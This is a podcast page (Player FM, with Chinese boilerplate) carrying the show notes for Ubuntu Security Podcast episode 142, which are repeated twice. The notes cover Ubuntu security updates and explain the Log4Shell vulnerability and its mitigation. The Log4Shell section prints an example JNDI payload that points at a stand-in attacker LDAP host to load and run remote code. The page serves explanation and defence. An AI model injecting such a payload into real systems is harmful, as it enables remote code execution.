This is the audio podcast version of Troy Hunt's weekly update video published here: https://www.troyhunt.com/tag/weekly-update/
…
continue reading
内容由Alex Murray and Ubuntu Security Team提供。所有播客内容(包括剧集、图形和播客描述)均由 Alex Murray and Ubuntu Security Team 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
Player FM -播客应用
使用Player FM应用程序离线!
使用Player FM应用程序离线!
Episode 142
Manage episode 314794516 series 2423058
内容由Alex Murray and Ubuntu Security Team提供。所有播客内容(包括剧集、图形和播客描述)均由 Alex Murray and Ubuntu Security Team 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
Overview
Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
This week in Ubuntu Security Updates
27 unique CVEs addressed
[USN-5183-1] BlueZ vulnerability [00:48]
- 1 CVEs addressed in Bionic (18.04 LTS)
- Heap based buffer overflow when handling overly large SDP requests - crash / possible code execution as a result
[USN-5186-1] Firefox vulnerabilities [01:08]
- 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- 95.0
[USN-5189-1] GLib vulnerability [01:34]
- 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
- By setting the
GLIB_CHARSETALIAS_DIR
env var, could then possibly exploit setuid binaries likepkexec
which are linked against glib to possibly read root-owned files - fixed to just have glib not read and use this environment variable
[USN-5142-3] Samba regression [02:29]
- 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Episode 138, Episode 141 - yet another upstream regression in Samba due to the most recent set of security updates which we discussed a month ago in episode 138
[USN-5174-2] Samba regression
- 4 CVEs addressed in Bionic (18.04 LTS)
[USN-5191-1] Flatpak vulnerability [02:48]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Possible to escape the flatpak sandbox by tricking services running on the host that they were not in fact communicating with a flatpak sandboxed application but with a regular unconfined application. As such they then wouldn’t restrict the actions which they would perform on behalf of the flatpak’d application and so could allow it to then escape it’s own confinement
[USN-5193-1] X.Org X Server vulnerabilities [03:26]
- 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- 4 different OOB writes that could be triggered by X clients - could then cause the X server to crash or possible code execution etc
- In more recent releases, X runs as a regular user so impact is limited, and in most recent releases Ubuntu uses Wayland by default so it’s possible that on modern desktops there is no X server running at all \o/
[USN-5192-1] Apache Log4j 2 vulnerability [04:12]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
[USN-5197-1] Apache Log4j 2 vulnerability
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
Goings on in Ubuntu Security Community
Log4Shell explodes the internet [04:20]
- Vuln announced on Twitter late last Thursday / early Friday morning, linking to the upstream Github issue of a possible remote code execution vuln in Apache Log4j 2
- Quickly it became apparent this was a high profile vuln that would affect a huge number of software products and have wide reaching consequences
- Over the weekend started being picked up by mainstream news not just the security industry
- Since then vendors and distros etc have scrambled to patch the vulnerability
- Ubuntu released updates on Monday -
2.15.0
for Ubuntu >= 20.04 LTS and otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1) - Stepping back
- What is Log4j?
- Extremely popular and widely used Java package for doing logging within applications
- Is the 252nd most popular component in Maven Central repo by download volume for November 2021
- Top 0.003% in popularity by downloads
- Also is a dependency in close to 7000 other open source projects - is even in the Mars rover’s Ingenuity helicopter
- Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)
- Plus a huge number of other projects:
- Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
- Initial reports were this was first seen being exploited in Minecraft
- Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
- Not to mention:
- Apple iCloud, Steam, Samsung Cloud storage and more
- What is the vulnerability?
- Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j
- JNDI allows Java objects to be referenced externally then loaded and used at runtime
- JNDI supports different protocols to fetch classes, including LDAP, even DNS etc
- Log4j supports lookups on variables which can encode a JNDI resource
- So if you log a variable such as
${jndi:ldap://attacker.com/malware}
Log4j will perform the lookup via LDAP to retrieve the Java class at that URI and then execute it - Remote code execution attacks don’t get any easier than this - esp since Java is write once, run anywhere - there is no architectural specific issues like with natively comiler languages like C/C++ etc
- As such wasn’t surprising to see this given the highest possible CVSS score of 10.0 by ASF
- How widespread is this issue?
- As mentioned earlier so many different pieces of software use Log4j and have Log4j embedded within them, it is not just sufficient to say update your Ubuntu packaged version of log4j - if you are running custom / proprietary Java applications they may likely contain their own copy of Log4j2 and you may have to go and patch that directly
- How to patch manually?
- The easiest option would be to get an updated version of the application from the original vendor
- Failing that, could go looking for all log4j2 jar archives and then could extract these (jar’s are zips afterall) and remove the offending class directly (
java/org/apache/logging/log4j/core/lookup/JndiLookup
)
- How is it being exploited?
- Kids popping Minecraft servers to other adversaries using this for more traditional attacks like deploying cryptominers etc - but given how widespread this issue is and how much coverage it has gotten it is likely everyone and anyone is looking to actively exploit it
- What is Log4j?
- Expect we will still be hearing about this for a long time - whether due to more vulns in Log4j2 but also since there are so many devices running Java out there and that likely have Log4j as part of that - could be a long tail of devices which take a long time (or even never get patched)
- Could be the basis of the next Mirai style botnet of compromised devices?
- In all the drama, it turned out there was a second vuln which could still be triggered to cause a least a DoS or possible information leaking / exfiltration - so a second upstream release
2.16.0
was done - this is now in Ubuntu >= 20.04 LTS as well (USN-5197-1) - KnowledgeBase article for this on the Ubuntu wiki too if you want more specific information
Ubuntu Security Podcast Holiday specials [12:52]
- Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series on cyber security threats and preparations for the holidays
- Will be publishing that over the next couple weeks whilst the regular episodes take a break
Ubuntu Security Podcast on break [13:37]
- Will take a break for a few weeks and be back in early January
- Wishing all listeners a safe and happy time if you are celebrating the holidays - fingers crossed 🤞 there is no more Log4Shell type vulnerabilities that drop during that time and everyone can have a proper break to recharge before 2022
- We’ll be back then to bring you all the news for Ubuntu Security again
Get in contact
228集单集
Manage episode 314794516 series 2423058
内容由Alex Murray and Ubuntu Security Team提供。所有播客内容(包括剧集、图形和播客描述)均由 Alex Murray and Ubuntu Security Team 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
Overview
Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
This week in Ubuntu Security Updates
27 unique CVEs addressed
[USN-5183-1] BlueZ vulnerability [00:48]
- 1 CVEs addressed in Bionic (18.04 LTS)
- Heap based buffer overflow when handling overly large SDP requests - crash / possible code execution as a result
[USN-5186-1] Firefox vulnerabilities [01:08]
- 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- 95.0
[USN-5189-1] GLib vulnerability [01:34]
- 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
- By setting the
GLIB_CHARSETALIAS_DIR
env var, could then possibly exploit setuid binaries likepkexec
which are linked against glib to possibly read root-owned files - fixed to just have glib not read and use this environment variable
[USN-5142-3] Samba regression [02:29]
- 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Episode 138, Episode 141 - yet another upstream regression in Samba due to the most recent set of security updates which we discussed a month ago in episode 138
[USN-5174-2] Samba regression
- 4 CVEs addressed in Bionic (18.04 LTS)
[USN-5191-1] Flatpak vulnerability [02:48]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- Possible to escape the flatpak sandbox by tricking services running on the host that they were not in fact communicating with a flatpak sandboxed application but with a regular unconfined application. As such they then wouldn’t restrict the actions which they would perform on behalf of the flatpak’d application and so could allow it to then escape it’s own confinement
[USN-5193-1] X.Org X Server vulnerabilities [03:26]
- 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
- 4 different OOB writes that could be triggered by X clients - could then cause the X server to crash or possible code execution etc
- In more recent releases, X runs as a regular user so impact is limited, and in most recent releases Ubuntu uses Wayland by default so it’s possible that on modern desktops there is no X server running at all \o/
[USN-5192-1] Apache Log4j 2 vulnerability [04:12]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
[USN-5197-1] Apache Log4j 2 vulnerability
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
Goings on in Ubuntu Security Community
Log4Shell explodes the internet [04:20]
- Vuln announced on Twitter late last Thursday / early Friday morning, linking to the upstream Github issue of a possible remote code execution vuln in Apache Log4j 2
- Quickly it became apparent this was a high profile vuln that would affect a huge number of software products and have wide reaching consequences
- Over the weekend started being picked up by mainstream news not just the security industry
- Since then vendors and distros etc have scrambled to patch the vulnerability
- Ubuntu released updates on Monday -
2.15.0
for Ubuntu >= 20.04 LTS and otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1) - Stepping back
- What is Log4j?
- Extremely popular and widely used Java package for doing logging within applications
- Is the 252nd most popular component in Maven Central repo by download volume for November 2021
- Top 0.003% in popularity by downloads
- Also is a dependency in close to 7000 other open source projects - is even in the Mars rover’s Ingenuity helicopter
- Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)
- Plus a huge number of other projects:
- Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
- Initial reports were this was first seen being exploited in Minecraft
- Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
- Not to mention:
- Apple iCloud, Steam, Samsung Cloud storage and more
- What is the vulnerability?
- Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j
- JNDI allows Java objects to be referenced externally then loaded and used at runtime
- JNDI supports different protocols to fetch classes, including LDAP, even DNS etc
- Log4j supports lookups on variables which can encode a JNDI resource
- So if you log a variable such as
${jndi:ldap://attacker.com/malware}
Log4j will perform the lookup via LDAP to retrieve the Java class at that URI and then execute it - Remote code execution attacks don’t get any easier than this - esp since Java is write once, run anywhere - there is no architectural specific issues like with natively comiler languages like C/C++ etc
- As such wasn’t surprising to see this given the highest possible CVSS score of 10.0 by ASF
- How widespread is this issue?
- As mentioned earlier so many different pieces of software use Log4j and have Log4j embedded within them, it is not just sufficient to say update your Ubuntu packaged version of log4j - if you are running custom / proprietary Java applications they may likely contain their own copy of Log4j2 and you may have to go and patch that directly
- How to patch manually?
- The easiest option would be to get an updated version of the application from the original vendor
- Failing that, could go looking for all log4j2 jar archives and then could extract these (jar’s are zips afterall) and remove the offending class directly (
java/org/apache/logging/log4j/core/lookup/JndiLookup
)
- How is it being exploited?
- Kids popping Minecraft servers to other adversaries using this for more traditional attacks like deploying cryptominers etc - but given how widespread this issue is and how much coverage it has gotten it is likely everyone and anyone is looking to actively exploit it
- What is Log4j?
- Expect we will still be hearing about this for a long time - whether due to more vulns in Log4j2 but also since there are so many devices running Java out there and that likely have Log4j as part of that - could be a long tail of devices which take a long time (or even never get patched)
- Could be the basis of the next Mirai style botnet of compromised devices?
- In all the drama, it turned out there was a second vuln which could still be triggered to cause a least a DoS or possible information leaking / exfiltration - so a second upstream release
2.16.0
was done - this is now in Ubuntu >= 20.04 LTS as well (USN-5197-1) - KnowledgeBase article for this on the Ubuntu wiki too if you want more specific information
Ubuntu Security Podcast Holiday specials [12:52]
- Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series on cyber security threats and preparations for the holidays
- Will be publishing that over the next couple weeks whilst the regular episodes take a break
Ubuntu Security Podcast on break [13:37]
- Will take a break for a few weeks and be back in early January
- Wishing all listeners a safe and happy time if you are celebrating the holidays - fingers crossed 🤞 there is no more Log4Shell type vulnerabilities that drop during that time and everyone can have a proper break to recharge before 2022
- We’ll be back then to bring you all the news for Ubuntu Security again
Get in contact
228集单集
所有剧集
×欢迎使用Player FM
Player FM正在网上搜索高质量的播客,以便您现在享受。它是最好的播客应用程序,适用于安卓、iPhone和网络。注册以跨设备同步订阅。